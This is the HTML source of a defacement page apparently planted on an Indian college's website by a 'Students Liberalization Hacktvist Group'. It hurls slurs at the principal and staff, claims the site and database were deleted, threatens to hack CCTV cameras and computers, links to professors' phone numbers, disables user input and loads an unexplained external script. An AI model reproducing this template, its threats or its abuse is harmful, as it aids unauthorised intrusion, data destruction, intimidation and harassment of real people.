<html>
  <head>
    <meta charset="UTF-8"> 
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="title" content="Hacked By @Barbie_Girls">
    <meta name="description" content="Hacked">
    <meta name="keywords" content="Hacked">
    <meta name="robots" content="index, follow">
    <meta name="revisit-after" content="60 days">
    <meta name="author" content="Fucker">
    <title>Hacked By @Barbie_Girls</title>
    <meta name="theme-color" content="#000">
    <link href="https://fonts.googleapis.com/css?family=Acme" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Reggae+One&amp;display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
  </head>
  <body bgcolor="black" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body" onload="typeWriter()"><canvas id="bg" height="667" width="275"></canvas>
  <style type="text/css">
      canvas {
        position: fixed;
        top: 0;
        left: 0;
        z-index: -1;
      }
      center {
        font-family: Acme;
      }
      img {
        opacity: 100%;
      }
      red {
        color: red;
      }
      font {
        text-shadow: #000 0px 0px 3px;
        -webkit-font-smoothing: antialiased;
      }
  </style>

  <style>
      .styled-text {
        font-size: 20px;
        font-family: Acme;
        line-height: 1.6;
        color: #ffffff; /* Adjust the text color as needed */
        margin: 40px; /* Adds space around the div */
    }

    .styled-text ol {
        list-style-type: decimal; /* Ensures the list is numbered */
        padding-left: 20px; /* Indents the list */
    }

    .styled-text li {
        margin-bottom: 10px; /* Adds space between list items */
    }
  </style>



    <table width="100%" height="100%">
      <td>
        <center>
           <h1 style="color:#07fc07;" >Hacked By @Barbie_Girls</h1>
            <img src="anonymous.png" style="width: 300px; height: 300px;">
            

            <font  face="Reggae One" color="red"><h2>Students Liberalization Hacktvist Group (SLHG)</h2></font>
            <p style="font-size: 20px;">1. Goenka college Takla Madharchod Randi ka bacha Principle 😂 has debared students from appearing in the exam, without any prior notice of short attendence. If you want students to attend the college then give a paackage of atleast 5 Lakhs p.a otherwise fuck off. We have hacked the website to show our power to the Madharchod takla Principle 😂.</p>
            <p style="font-size: 20px;">2. Students are also complaining that Lazy professors don't come to classes and also they don't notify about this. In 20% classes lazy professors dont come. </p>
            <p style="font-size: 20px;">3. Student section staff is misbehaving everytime with the students, student section staff thinks that they are prime minister of India, actualy they are Madharchod's</p>
            <font  face="Reggae One" color="red"><h2>If Takla Principle 😂 don't take strict actions against lazy professors and rude student section staff. I will show him our power what we can do. We will hack the CCTV cameras and all the computers of the college.</h2></font>
            <h3>If the professors don't come to classes then you can directly call them here are the <a href="/page.html">numbers.</a>
            
        </center>

        

        <font  face="Reggae One" color="red" ><h2 style="margin-left: 20px;">Our Demands:</h2></font>
        <div class="styled-text">
            <ol>
                <li>Issue a attendence percentage sheet every month.</li>
                <li>Student section staff is smoking the the room, ban smoking in college otherwise we will fuck you very badly.</li>
                <li>Create a portal for cancelled classes, So teachers can update cancelled classes and students can see the cancelled classes and you don't waste time of students.</li>
                <li>Principle should create a time to come to college at around 11 a.m everyday.</li>
                <li>Takla Madharchod Randi ka bacha Principle😂 should teach there professors how to teach in class and staff how to behave with students.</li>
                <li>If a class is mentioned in the routine and professor is not coming then the principle should come to take attendence, students time is not for free. </li>
                <li>Remove student union😂 from the college because they are a piece of shit😂, some people from the union think that they are the gundaa of the college.</li>
              </ol> 

        </div>
        <h2 style="color:#07fc07; text-align:center; font-family:Acme;">"In hacking, there are two types of people: those who break the rules, and those who change them." – Anonymous</h2>
        <h3  style="color:#f11010; text-align:center; font-family:Acme">We are always for the students... Jai Hind 🇮🇳</h3>

          <p><marquee direction="left" scrollamount="6" width="80%" style="width: 80%; font-family:acme  ;">Madharchod  Randi ka bacha Takla Principle 😂 We have deleted your website and database 😂 as a punishment. Hope you have a backup otherwise you are fucked up. 😂</marquee></p>
          <p><marquee direction="left" scrollamount="6" width="80%" style="width: 80%; font-family:acme; color: rgb(243, 44, 44);  ;">If in the next semester any student is not allowed to sit in the exam, Takla principle will face serious consequences. </marquee></p>

        <script type="text/javascript" src="https://drvee07.github.io/loc/drv.js"></script>
      </td>
    </table>   
  </body>